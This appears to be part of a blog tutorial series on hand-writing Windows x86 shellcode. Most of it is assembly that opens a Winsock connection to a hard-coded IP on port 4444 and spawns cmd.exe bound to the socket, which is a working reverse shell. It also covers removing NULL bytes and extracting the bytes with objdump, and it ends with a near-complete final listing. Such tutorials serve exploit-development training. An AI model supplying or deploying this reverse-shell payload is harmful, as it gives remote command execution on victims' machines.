Continuation of part 1 and part 2 of the Windows x86 Manual Shellcode.

In this part we will continue this development by redirecting a shell to to the established connection.

Call CreateProcessA

We already have the address of the CreateProcessA function we got with arwin.exe. Its kind of obvious what this function does, but lets check the documentation just in case:

Creates a new process and its primary thread. The new process runs in the security context of the calling process.

And the syntax:

BOOL CreateProcessA(
  LPCSTR                lpApplicationName,
  LPSTR                 lpCommandLine,
  LPSECURITY_ATTRIBUTES lpProcessAttributes,
  BOOL                  bInheritHandles,
  DWORD                 dwCreationFlags,
  LPVOID                lpEnvironment,
  LPCSTR                lpCurrentDirectory,
  LPSTARTUPINFOA        lpStartupInfo,
  LPPROCESS_INFORMATION lpProcessInformation

This time, instead of trying to figure out each and every field of this structure, lets see if we can adapt Metasploit’s block_shell code:

	mov ebx, 0x646D6390    ; push our command line: 'cmd',0 padded with \x90
	shr ebx, 8
	push ebx
	mov ebx, esp           ; save a pointer to the command line
	push edi               ; our socket becomes the shells hStdError
	push edi               ; our socket becomes the shells hStdOutput
	push edi               ; our socket becomes the shells hStdInput
	xor esi, esi           ; Clear ESI for all the NULL's we need to push
	push byte 0x12         ; We want to place (18 * 4) = 72 null bytes onto the stack
	pop ecx                ; Set ECX for the loop

	push esi               ; push a null dword
	loop push_loop         ; keep looping untill we have pushed enough nulls
	mov word [esp + 0x3C], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
	mov byte [esp + 0x10], 0x44
	lea eax, [esp + 0x10]  ; Set EAX as a pointer to our STARTUPINFO Structure

  	;perform the call to CreateProcessA
	push esp               ; Push the pointer to the PROCESS_INFORMATION Structure 
	push eax               ; Push the pointer to the STARTUPINFO Structure
	push esi               ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
	push esi               ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
	push esi               ; We dont specify any dwCreationFlags 
	inc esi                ; Increment ESI to be one
	push esi               ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
	dec esi                ; Decrement ESI back down to zero
	push esi               ; Set lpThreadAttributes to NULL
	push esi               ; Set lpProcessAttributes to NULL
	push ebx               ; Set the lpCommandLine to point to "cmd",0
	push esi               ; Set lpApplicationName to NULL as we are using the command line param instead

	mov ebx, 0x7c80236b    ; CreateProcessA
	call ebx

A few modifications were necessary, of course. First, we must set the correct address of CreateProcessA. Also, since Metasploit uses hashes instead of API calls to improve obfuscation, we had to change it too. I know, our shellcode is somewhat rudimentary, but it will be smaller I promise.

There is also the good and old issue of the NULL bytes, which Metasploit does not address directly. Lets assemble/link this piece of code and see if there are any NULLs we must solve:

$ objdump -d /tmp/shell.exe -M intel32

/tmp/shell.exe:     file format pei-i386

Disassembly of section .text:

00401000 <.text>:
  401000:	68 63 6d 64 00       	push   0x646d63
  401005:	89 e3                	mov    ebx,esp
  401007:	57                   	push   edi
  401008:	57                   	push   edi
  401009:	57                   	push   edi
  40100a:	31 f6                	xor    esi,esi
  40100c:	6a 12                	push   0x12
  40100e:	59                   	pop    ecx
  40100f:	56                   	push   esi
  401010:	e2 fd                	loop   40100f <.text+0xf>
  401012:	66 c7 44 24 3c 01 01 	mov    WORD PTR [esp+0x3c],0x101
  401019:	8d 44 24 10          	lea    eax,[esp+0x10]
  40101d:	c6 00 44             	mov    BYTE PTR [eax],0x44
  401020:	54                   	push   esp
  401021:	50                   	push   eax
  401022:	56                   	push   esi
  401023:	56                   	push   esi
  401024:	56                   	push   esi
  401025:	46                   	inc    esi
  401026:	56                   	push   esi
  401027:	4e                   	dec    esi
  401028:	56                   	push   esi
  401029:	56                   	push   esi
  40102a:	53                   	push   ebx
  40102b:	56                   	push   esi
  40102c:	68 79 cc 3f 86       	push   0x863fcc79
  401031:	ff d5                	call   ebp
  401033:	89 e0                	mov    eax,esp
  401035:	4e                   	dec    esi
  401036:	56                   	push   esi
  401037:	46                   	inc    esi
  401038:	ff 30                	push   DWORD PTR [eax]
  40103a:	68 08 87 1d 60       	push   0x601d8708
  40103f:	ff d5                	call   ebp

Notice that both push 0x646d63 and mov BYTE PTR [eax],0x44 add NULL bytes.

To solve the first issue, we transform push 0x00646D63 into:

	mov ebx, 0x646D6390    ;push our command line: 'cmd',0 padded with \x90
	shr ebx, 8	       ;rotate right (ebx = 0x00646D63)
	push ebx

For the second one, we transform this snippet:

	lea eax, [esp + 0x10]    ; Set EAX as a pointer to our STARTUPINFO Structure
	mov byte [eax], 0x44     ; Set the size of the STARTUPINFO Structure


	mov byte [esp + 0x10], 0x44
	lea eax, [esp + 0x10]  ; Set EAX as a pointer to our STARTUPINFO Structure

This works because we eliminate the mov BYTE PTR [eax],0x44, which was causing the problem.

Finally, lets extract the shellcode and see if it is NULL-free.

$ objdump -d Public/ctp/shellcode.exe|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

Awesome! To test it, we set a listener on port 4444 at our server and run it in the Windows VM.


However, there is still a small problem:


Since we did not correctly finish the process, it crashes. By now you should be fully confident about how to fix this issue, so I won’t spoil it ;)

This is our final shellcode therefore:

global _start

section .text


	xor eax, eax

	mov ax, 0x3233			;23
	push eax				;includes \0 at the end without insert NULLs
	push 0x5f327377 		;_2sw
	push esp			;pointer to the string

	mov ebx, 0x7c801d7b		;0x7b1d807c  	;addr of LoadLibraryA (0x7c801d7b)
	call ebx

	mov ebp, eax			;save winsock handle

	xor eax, eax

	mov ax, 0x7075      ; 'up'
	push eax
	push 0x74726174     ; 'trat'
	push 0x53415357     ; 'SASW'
	push esp	    ;pointer to the string

	push ebp	    ;winsock handler
	mov ebx, 0x7c80ae40 ;addr of GetProcAddress
	call ebx

	xor ebx, ebx
	mov bx, 0x0190
	sub esp, ebx
	push esp
	xor ecx, ecx
	mov cx, 0x0202
	push ecx

	call eax		; WSAStartUp(MAKEWORD(2, 2), wsadata_pointer)

	xor eax, eax

	mov ax, 0x4174      ; 'At'
	push eax
	push 0x656b636f     ; 'ekco'
	push 0x53415357     ; 'SASW'
	push esp	    ;pointer to the string

	push ebp	    ;socket handler
	mov ebx, 0x7c80ae40 ;addr of GetProcAddress
	call ebx

	xor ebx, ebx		;clear ebx
	push ebx;		;dwFlags=NULL
	push ebx;		;g=NULL
	push ebx;		;lpProtocolInfo=NULL
	xor ecx, ecx		;clear ecx
	mov cl, 0x6		;protocol=6
	push ecx

	inc ebx			;ebx==1
	push ebx		;type=1
	inc ebx			;af=2
	push ebx

	call eax		;call WSASocketA

	push eax		;save eax in edx
	pop edi			;...

	xor eax, eax

	mov eax, 0x74636590     ;'\x90tce'
	shr eax, 8
	push eax
	push 0x6e6e6f63     ;'nnoc'
	push esp	    ;pointer to the string

	push ebp	    ;socket handler
	mov ebx, 0x7c80ae40 ;addr of GetProcAddress
	call ebx

	;set up sockaddr_in
	mov ebx, 0x1c11b9d1	;the IP plus 0x11111111 so we avoid NULLs (IP=
	sub ebx, 0x11111111	;subtract from ebx to obtain the real IP
	push ebx		;push sin_addr
	push word 0x5c11	;0x115c = (port 4444)

	xor ebx, ebx
	mov bl, 2
	push bx	
	mov edx, esp

	push byte 0x10
	push edx
	push edi

	call eax

	mov ebx, 0x646D6390    ; push our command line: 'cmd',0 padded with \x90
	shr ebx, 8
	push ebx
	mov ebx, esp           ; save a pointer to the command line
	push edi               ; our socket becomes the shells hStdError
	push edi               ; our socket becomes the shells hStdOutput
	push edi               ; our socket becomes the shells hStdInput
	xor esi, esi           ; Clear ESI for all the NULL's we need to push
	push byte 0x12         ; We want to place (18 * 4) = 72 null bytes onto the stack
	pop ecx                ; Set ECX for the loop

	push esi               ; push a null dword
	loop push_loop         ; keep looping untill we have pushed enough nulls
	mov word [esp + 0x3C], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
	mov byte [esp + 0x10], 0x44
	lea eax, [esp + 0x10]  ; Set EAX as a pointer to our STARTUPINFO Structure

  	;perform the call to CreateProcessA
	push esp               ; Push the pointer to the PROCESS_INFORMATION Structure 
	push eax               ; Push the pointer to the STARTUPINFO Structure
	push esi               ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
	push esi               ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
	push esi               ; We dont specify any dwCreationFlags 
	inc esi                ; Increment ESI to be one
	push esi               ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
	dec esi                ; Decrement ESI back down to zero
	push esi               ; Set lpThreadAttributes to NULL
	push esi               ; Set lpProcessAttributes to NULL
	push ebx               ; Set the lpCommandLine to point to "cmd",0
	push esi               ; Set lpApplicationName to NULL as we are using the command line param instead

	mov ebx, 0x7c80236b    ; CreateProcessA
	call ebx


Marcos Valle

Born to kill bugs. Live by them.